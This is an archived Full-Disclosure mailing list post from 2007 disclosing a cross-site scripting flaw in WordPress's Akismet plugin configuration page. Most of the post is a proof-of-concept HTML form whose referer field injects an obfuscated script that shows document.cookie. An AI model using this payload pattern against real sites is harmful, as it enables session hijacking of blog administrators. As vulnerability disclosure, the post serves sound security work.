| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4648D1A6.6090906@mybeni.rootzilla.de> Date: Mon, 14 May 2007 23:16:22 +0200 From: mybeni websecurity <mybeni@...eni.rootzilla.de> To: submit@...w0rm.com Subject: Wordpress Akismet XSS flaw -------------------- CODE ----------------------------- <html> <body> <form action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options ยป" type="submit"> </form> </body> </html> -------------------- EOC ------------------------------ http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/ -- benjamin "beNi" mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi (coolest guy in da hood) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists